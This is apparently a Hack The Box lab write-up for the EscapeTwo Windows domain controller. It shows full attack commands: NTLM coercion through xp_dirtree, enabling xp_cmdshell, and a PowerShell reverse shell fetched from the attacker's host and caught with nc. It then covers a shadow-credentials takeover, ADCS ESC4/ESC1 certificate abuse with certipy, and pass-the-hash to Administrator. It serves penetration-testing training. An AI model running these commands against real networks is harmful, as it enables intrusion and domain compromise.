HTB - EscapeTwo

Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after: 2055-01-13T19:33:09
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Summary
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports:
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htb
Foothold
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
With the provided credentials, I will try to connect to services (SMB, MSSQL, LDAP, ..etc)
MSSQL
(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth
SQL (SEQUEL\rose guest@master)>
I tried to steal NTLMv2 credentials using xp_dirtree
function with SMBServer
running on my attacking machine, Then I got the hash but couldn't crack it, So I decided to look for different things.
xp_dirtree \\10.10.16.75\file.txt
sudo impacket-smbserver -smb2support share $(pwd)

I moved then to dump LDAP data and begin to enumerate the domain with bloodhound.py
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
Also, I tried to get kerberoastable accounts, and I got two of them, but I couldn't crack their hashes, either.

It's worth nothing to Check for ADCS existence as it opens many avenues of we to find any misconfiguration associated with the templates
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.51 389 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
ADCS 10.10.11.51 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.51 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.10.11.51 389 DC01 Found CN: sequel-DC01-CA
I looked for SMB shares
using my credentials and found I have access to two shared folders:

InAccounting Department
, there is account.xlsx
file. First, I tried to open it with Microsoft Excel
or any xlsx
viewer but it said the file is corrupted.
Since xlsx
can be treated as zip
file, I unzipped it and began to look for any interesting info.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx accounts.xlsx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx
Archive: accounts.xlsx
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
Inside xl/SharedStrings.xml
, there are several credentials
Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxx
Lateral Movement
Using sa
account, I can log in to the MSSQL instance as an admin

Impacket version v0.12.0
has built-in commands to automate some attacks, I will use enable_xp_cmdshell
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
I will host PowerShell reverse shell on my web server and download it to the machine
To generate a reverse shell:
python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337
Download and Execute the shell
SQL (sa dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1
Receive Connection
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422
JokerShell C:\Windows\system32>
Under C:\
, there is SQL019
folder
JokerShell C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM Windows
I found sql
configuration file, let's see its content

I found the credentials of sql_svc
as which I'm running my shell
JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"
With that password, I will try to spray other users in the system

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxx
User Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx
Privilege Escalation
I will use powerview.py
to manually enumerate user's privileges
(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114
Ryan
has WriteOwner
on Ca_svc

With these privileges, I will Add Ownership
to Ryan
, then give him fullcontrol
and after that, I can perform Shadow Credentials
, Reset Password
or targeted Kerberosasting
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
Get NT
hash of ca_svc
using shadow credential
attack

With ca_svc
hash, I can authenticate to the domain and begin to enumerate ADCS
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
..snip..
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
So, there is a template vulnerable to ESC4
. That means I have permission to change the attribute associated with that template and make it vulnerable to ESC1
ESC1
is an escalation of misconfigured template is allowed to supplysubject alternative name
and can be abused to add any user of the domain (Administrator) to the template and get certificate for them.
certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb
Get administrator hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
[_] Using principal: administrator@sequel.htb
[_] Trying to get TGT...
[_] Got TGT
[_] Saved credential cache to 'administrator.ccache'
[_] Trying to retrieve NT hash for 'administrator'
[_] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
Root Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
Last updated